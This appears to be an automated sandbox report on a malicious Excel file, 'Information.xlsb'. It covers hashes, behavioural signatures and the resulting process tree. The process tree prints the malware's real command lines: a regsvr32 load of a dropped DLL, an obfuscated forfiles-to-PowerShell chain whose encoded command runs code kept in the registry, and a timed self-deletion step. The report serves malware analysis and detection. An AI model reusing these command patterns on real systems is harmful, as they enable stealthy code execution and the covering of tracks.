Analysis
-
max time kernel
139s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-11-2020 10:08
Static task
static1
Behavioral task
behavioral1
Sample
Information.xlsb
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Information.xlsb
Resource
win10v20201028
General
-
Target
Information.xlsb
-
Size
20KB
-
MD5
4dddb0320eac6050d6360c92c104d05c
-
SHA1
816db7af62de3dc200b88357a5341c6ce184cc93
-
SHA256
ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f
-
SHA512
b177b5faa839aeead6c9c732b0182b928903dd34e02d968b95cd93b2f3f01c3b72043c9dafcb6a96a9d1eeb67e4e12abaf537f7ac32b3d166d7f82914844881d
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
regsvr32.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 672 1048 regsvr32.exe EXCEL.EXE -
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 644 regsvr32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3080 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0FA4161A-25A1-11EB-B59A-52BC0BFFD7E7} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30849453" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80494be7adb9d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0803ae7adb9d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3827347098" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30849453" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000db23f97af8a214a9da3619968f11747c516bfe4634f50f6dcb8b5fafa7f90ef8000000000e80000000020000200000001458d03affe55a775ac3b61f032205158ac6d451837c785b49026a0760df5bde20000000171ab48a8c9b24cfaa4c008dde4671d4714df3b2db7a98bc18fd3280bc51e5ae40000000b384c56caa8b0d2c954a1f9c2d8d1f7d33738e33f7b68e4e57ae7275a4efcc16e55f826114453e3f137f80d764cb43e901b2b6e3c4f5cea57845729a681ab70c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3827347098" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000d68ce214c6e129f098f8e4cb42a6d3d12dcd9b24b1b3f4f8bb57fdbe5af81af5000000000e80000000020000200000008820f002ac0025ceb93c2492b84f708098f8a3d615a879c5ccae74f351d5c1272000000025f9157bc716696a798f67552051e7eeee87ece3400cad7c1ca4a76f65cc4a4840000000d44dbdd3cdb5e348fee702ad733cb6fc723b2e991deac91a115c0b8a49baa31453e4fe42f01edaada0ecce9880702c886603abaf37669096eb6487e0ac4301a8 iexplore.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1048 EXCEL.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
timeout.exepid process 3080 timeout.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.execmd.exepid process 1460 powershell.exe 1800 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1460 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1348 iexplore.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEpid process 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1348 iexplore.exe 1348 iexplore.exe 2536 IEXPLORE.EXE 2536 IEXPLORE.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE 1048 EXCEL.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EXCEL.EXEregsvr32.exeiexplore.execmd.exeforfiles.execmd.exepowershell.execsc.execsc.execmd.exedescription pid process target process PID 1048 wrote to memory of 672 1048 EXCEL.EXE regsvr32.exe PID 1048 wrote to memory of 672 1048 EXCEL.EXE regsvr32.exe PID 672 wrote to memory of 644 672 regsvr32.exe regsvr32.exe PID 672 wrote to memory of 644 672 regsvr32.exe regsvr32.exe PID 672 wrote to memory of 644 672 regsvr32.exe regsvr32.exe PID 1348 wrote to memory of 2536 1348 iexplore.exe IEXPLORE.EXE PID 1348 wrote to memory of 2536 1348 iexplore.exe IEXPLORE.EXE PID 1348 wrote to memory of 2536 1348 iexplore.exe IEXPLORE.EXE PID 2212 wrote to memory of 3928 2212 cmd.exe forfiles.exe PID 2212 wrote to memory of 3928 2212 cmd.exe forfiles.exe PID 3928 wrote to memory of 3172 3928 forfiles.exe cmd.exe PID 3928 wrote to memory of 3172 3928 forfiles.exe cmd.exe PID 3172 wrote to memory of 1460 3172 cmd.exe powershell.exe PID 3172 wrote to memory of 1460 3172 cmd.exe powershell.exe PID 1460 wrote to memory of 3656 1460 powershell.exe csc.exe PID 1460 wrote to memory of 3656 1460 powershell.exe csc.exe PID 3656 wrote to memory of 3804 3656 csc.exe cvtres.exe PID 3656 wrote to memory of 3804 3656 csc.exe cvtres.exe PID 1460 wrote to memory of 3188 1460 powershell.exe csc.exe PID 1460 wrote to memory of 3188 1460 powershell.exe csc.exe PID 3188 wrote to memory of 616 3188 csc.exe cvtres.exe PID 3188 wrote to memory of 616 3188 csc.exe cvtres.exe PID 1460 wrote to memory of 3040 1460 powershell.exe Explorer.EXE PID 1800 wrote to memory of 3080 1800 cmd.exe timeout.exe PID 1800 wrote to memory of 3080 1800 cmd.exe timeout.exe PID 1800 wrote to memory of 3080 1800 cmd.exe timeout.exe PID 1800 wrote to memory of 3080 1800 cmd.exe timeout.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Information.xlsb"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\regsvr32.exeregsvr32 -s C:\ProgramData\Dori.ocx3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe-s C:\ProgramData\Dori.ocx4⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\forfiles.exeforfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\btyibkn2\btyibkn2.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C5E.tmp" "c:\Users\Admin\AppData\Local\Temp\btyibkn2\CSC15F867EB6A1C4A98AA499F9BA5721F7.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3uxnskv\t3uxnskv.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D19.tmp" "c:\Users\Admin\AppData\Local\Temp\t3uxnskv\CSCA1809FBDE8B8427D903D5E85B3BAFD32.TMP"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\ProgramData\Dori.ocx"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1348 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Dori.ocxMD5
745868c40e6f1d1d40ae60335417f6d7
SHA1cfe42b4014fc22596b4305271c4a133492603349
SHA2567a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93
SHA512fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08MD5
a69fba04d9b13e82fb772d1b38b6054a
SHA1f7ab8c1d32ddc58e13f65f9b8bb0cc844f164454
SHA256733d04f9d9e1fdf85914f097cca3f8bfb3926c38a7ccf69e7c74d887abbc64ff
SHA5126fae50c73cc08c48d5ecb6814785f82c46ded1dc00ba9a8b02a9b2bd907a10bba6015e0a5753487a12765db242162ce4f822bf5d3381a71ae2143c9f5d34669a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08MD5
1d813802e31ab8f67fff786fec7006b4
SHA163d22e24c70a3fac1ed61358ce1e99e3cf892bdf
SHA2569923cd9760500e815cb0a1ca7cf7023b7fd5645688914d2c5a625156454d58a8
SHA5124796a63c5c75fc6f0c92b78b8acda488db593a9551e674c23004b71dc558c8de2fe555d9ac495b1d70fe3fb188031c78a3923b361aa148707450f81f8ec1275d
-
C:\Users\Admin\AppData\Local\Temp\RES3C5E.tmpMD5
67480ecb87893c5981de203a3332bbe0
SHA19c2364143e281b3d993034fd7290c2412ab68185
SHA256dcbed6d6c4ec7399c1d5e1066e2502e31998f8b52c9417320ebe070e45bb5d46
SHA5126c4f317d2be27648b6b1bac126cffe3ca7e767958eba5006f4ec651c8bea550f17117a495d405a76253de18d0992705ccd3b850be6729c09afc0851254997d1d
-
C:\Users\Admin\AppData\Local\Temp\RES3D19.tmpMD5
066d543bb969bbadd2616f2271b1cc27
SHA1c3103317f37fabccb9aa3780361715cbc17f6af8
SHA2560219fea6ffd18be2b657463828eccd928c85ab70320d05b27ba00bd37009882a
SHA5121da7ef49244b6b80c75cbdc77c56e94c39a2398e4d2193c4001a048eda5eea8350e51a3ffeb680a5ac48308753b5d378a271c6c45aef9110590d4ec2bb2dcb4e
-
C:\Users\Admin\AppData\Local\Temp\btyibkn2\btyibkn2.dllMD5
5ae7e66f34db664a08814f011611203b
SHA171a8e52a4a215dd516be5c4ed113bd18e3c9f9d6
SHA2563c71e9b354f9af22172ea41ecdfa9d3307355fb22828cf8d28ce6ddca18a28eb
SHA512cb45fb15e0ef49856ffe18880350260a9ce275521be84b9748a24efd44b3465ce19fc7a55e2115ff1299accba595e885dc56a4fa00a206209110fa622ffead85
-
C:\Users\Admin\AppData\Local\Temp\t3uxnskv\t3uxnskv.dllMD5
a8c23fbd46fc67d7ee0159be0ba17de0
SHA111057cb57bab06ebefa86642e885553ce8afaf52
SHA256c91d093e4860e49b503b6aa230ae8af006a5e5b24b4dd6fe20df9a74753175ba
SHA51258df70d22fec0a6d6d724686129b92e51e261b65070a0110a471e67899ebdb9361a75b0f215c0d75f0135f8524fbfdb5fbf9099cb43bf5dbea0d75c700486953
-
\??\c:\Users\Admin\AppData\Local\Temp\btyibkn2\CSC15F867EB6A1C4A98AA499F9BA5721F7.TMPMD5
468c6b4f7263bfd03f8bac4fba9ca406
SHA19c27cbf4ef34591ac9b86dc425d533146271aaaa
SHA256754617d0f90e899d4b56322ac0047233ad9930f33b0681fa16423ffc6b5b2851
SHA51275e29bfa9fe4c8512d9558d00734369e465c6d136e637dede3dcc6dd7848b078c9fc5488f877e86c77422f3aaf3ef0296b10d6ffd4c32a20ae18b7e8797f9395
-
\??\c:\Users\Admin\AppData\Local\Temp\btyibkn2\btyibkn2.0.csMD5
aee5ecef6b6a9b4372991443276b71ce
SHA1911bd26fba4c5e51423f2c6339cc267f8697f339
SHA25690e03a7c9cb196fd260c54663a4c867f33621ac29746cd8c0a4b2aa9b390754a
SHA512cf99d4941aa5d1a4dd3abd5ca7a4d3d19a7f497c3247fd09505e263a9a4646b81eb19d7a9312b17a00d22ca9881b6d725b76013b7dc470dcc964b77970c96cc3
-
\??\c:\Users\Admin\AppData\Local\Temp\btyibkn2\btyibkn2.cmdlineMD5
9fbb423672ec5c7bae14859e2108492a
SHA12e3f9782bf8752d510df47779eadbeb478787ca8
SHA2569b93200474ffc08829d18a2ff651928f79ea152e2e4caa8ddd66aeebc336fb01
SHA5127100041e599d7e73d115e99f17d5a2afe7269b02a1d289aa24358b462638f20102cccb028b688ce0b5660172abe2a5b525ec610d90b0de2a45fedeeeb3f2b2d8
-
\??\c:\Users\Admin\AppData\Local\Temp\t3uxnskv\CSCA1809FBDE8B8427D903D5E85B3BAFD32.TMPMD5
626e6038d6b3b66969e2505a61126f46
SHA1e6029d0bd335c5ab8e04bb92bf6f1f3cd7026719
SHA256836533123405cb30f167d01a10e634df296653f6dc03c8b4a9e82576d41be820
SHA512cf0dc1101be01498d9c14b098844445d4bdefe313669881a01175884885af2993c1a41f5f2d0993a1cd0c4b368612699d8585b0b8007deef13ad29651845122e
-
\??\c:\Users\Admin\AppData\Local\Temp\t3uxnskv\t3uxnskv.0.csMD5
a5043957e07dbe0dee7bb8aad13a403e
SHA1571c9136e0e90d016dd83b24c40eadbf7186c701
SHA25673775570d08cc971668d853274b7c9a0cfb407cf76480747b9e38542e5dc53c9
SHA51214f98e4902059980ed8f46c72fdefeb404f14df0fa06628476d63f9bb9ed76fd6398abd4de8c1de7dfa2a8b2108c31e2b9b668acfc92958c1eecc4a0c8d656a1
-
\??\c:\Users\Admin\AppData\Local\Temp\t3uxnskv\t3uxnskv.cmdlineMD5
5b0126987d91b180088e080cce947a94
SHA18b4165fbaaa5e6401ae03a3fdc99bdbd62488b93
SHA2566f9f9a630c4d9f064589d570a8d7c0c7d3f2f9567b419d5270fb1b44c2d62482
SHA51274c53208e26d39c326d592be1cd2bf82a2f7822e17287a80e156c275ec25fc43536e77946b7d521ca3cd8a817cf3488d6a9d196397be38912588a615abfd3ad3
-
\ProgramData\Dori.ocxMD5
745868c40e6f1d1d40ae60335417f6d7
SHA1cfe42b4014fc22596b4305271c4a133492603349
SHA2567a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93
SHA512fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18
-
memory/616-27-0x0000000000000000-mapping.dmp
-
memory/644-3-0x0000000000000000-mapping.dmp
-
memory/644-5-0x0000000003400000-0x0000000003412000-memory.dmpFilesize
72KB
-
memory/672-1-0x0000000000000000-mapping.dmp
-
memory/1048-0-0x00007FFEA3F70000-0x00007FFEA45A7000-memory.dmpFilesize
6.2MB
-
memory/1460-33-0x0000026B427C0000-0x0000026B427D8000-memory.dmpFilesize
96KB
-
memory/1460-15-0x0000026B42640000-0x0000026B42641000-memory.dmpFilesize
4KB
-
memory/1460-31-0x0000026B425F0000-0x0000026B425F1000-memory.dmpFilesize
4KB
-
memory/1460-14-0x0000026B42370000-0x0000026B42371000-memory.dmpFilesize
4KB
-
memory/1460-23-0x0000026B425E0000-0x0000026B425E1000-memory.dmpFilesize
4KB
-
memory/1460-13-0x00007FFE9AE20000-0x00007FFE9B80C000-memory.dmpFilesize
9.9MB
-
memory/1460-12-0x0000000000000000-mapping.dmp
-
memory/1800-34-0x000001F8480C0000-0x000001F8480D8000-memory.dmpFilesize
96KB
-
memory/2536-6-0x0000000000000000-mapping.dmp
-
memory/3080-35-0x0000000000000000-mapping.dmp
-
memory/3172-11-0x0000000000000000-mapping.dmp
-
memory/3188-24-0x0000000000000000-mapping.dmp
-
memory/3656-16-0x0000000000000000-mapping.dmp
-
memory/3804-19-0x0000000000000000-mapping.dmp
-
memory/3928-10-0x0000000000000000-mapping.dmp
-
memory/3928-9-0x0000000000000000-mapping.dmp